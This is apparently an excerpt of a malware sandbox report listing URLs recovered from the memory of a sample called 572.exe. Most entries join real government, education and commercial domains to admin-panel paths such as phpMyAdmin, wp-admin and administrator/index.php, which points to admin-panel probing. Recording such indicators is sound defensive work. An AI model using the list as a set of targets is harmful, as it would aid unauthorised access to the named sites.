                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/administrator/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/administrator/&
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/administrator/x26
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/co:26
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/phpMyAdmin/V2
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://m.sellercenter.lazada.com.my/pma/r2
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/admin.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/admin.phphp
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/administrator/S
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/administrator/index.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/phpMyAdmin/v
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/phpmyadmin/A
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/phpmyadmin/rb
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/pma/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/wp-admin/
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/wp-admin/f
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/wp-admin/hpDQ
                Source: 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/wp-admin/o0
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://midetuvelocidad.claro.com.pe/wp-login.phpvQ
                Source: 572.exe, 00000009.00000003.4262755230.0000000063EF9000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/PhpMyAdmin/Y
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/PhpMyAdmin/eampowered.comd.onion
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/administrator/index.phphpd
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://milogin.michigan.gov/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/administrator/21
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/phpmyadmin
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/phpmyadminx-age=0
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mitextoescolar.mineduc.cl/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/admin.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/admin.phponds
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/phpmyadmin/X
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mobile.liga365gacor.com/pma/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/phpmyadmin/in/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/phpmyadmin/index.php~
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pxndx-mcr.boletia.com/pma/a/Gx
                Source: 572.exe, 00000009.00000003.4390567048.00000000391EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E73A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4298111023.00000000406A8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4463057124.000000004E73B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.00000000390D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qingting.baidu.com/index?pid=19
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/
                Source: 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405D2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
                Source: 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/4
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B2E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039194000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304408636.00000000405D2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.0000000006245000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/K
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/index.phpcom
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/administrator/index.phpo
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ro.bongacams.com/phpmyadmin/aamorim.inovarmais.com
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/Z
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/phpmyadmin/K
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/pma/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s163-es.ogame.gameforge.com/pma/Admin/
                Source: explorer.exe, 00000002.00000000.2123596701.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2123582851.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2121884961.00000000028A0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/android-chrome-192x192.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-114x114.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-120x120.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-144x144.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-152x152.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-180x180.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-57x57.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-60x60.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-72x72.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/apple-touch-icon-76x76.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-16x16.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-194x194.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-32x32.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon-96x96.png
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/favicon.ico
                Source: 572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.imvu.com/common/withme/img/favicon/manifest.json
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/admin.php
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/admin.php(
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/admin.phpN
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/index.php
                Source: 572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/administrator/z
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4199132686.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/phpmyadmin/en)
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/wp-admin/hp80-
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.vexcorp.com/wp-login.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/PhpMyAdmin/E
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/index.php
                Source: 572.exe, 00000009.00000003.4054751612.000000004068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/index.phpams.com465990
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://service.uan.edu.co/administrator/index.phpet26A$
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin.php
                Source: 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin.php5G&
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/adminator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/i
                Source: 572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/index.php
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/administrator/x5
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/admintepec.edu.mx
                Source: 572.exe, 00000009.00000003.4513550067.000000004E0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/in
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/pma/
                Source: 572.exe, 00000009.00000003.4502455045.00000000058EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/pma/Admin/)(
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/pma/trator/Mr
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-admin/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-login.php
                Source: 572.exe, 00000009.00000003.4521192060.000000004E617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicios.sat.gob.mx/wp-login.phpV
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E7AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://servicossociais.caixa.gov.br/administrator/
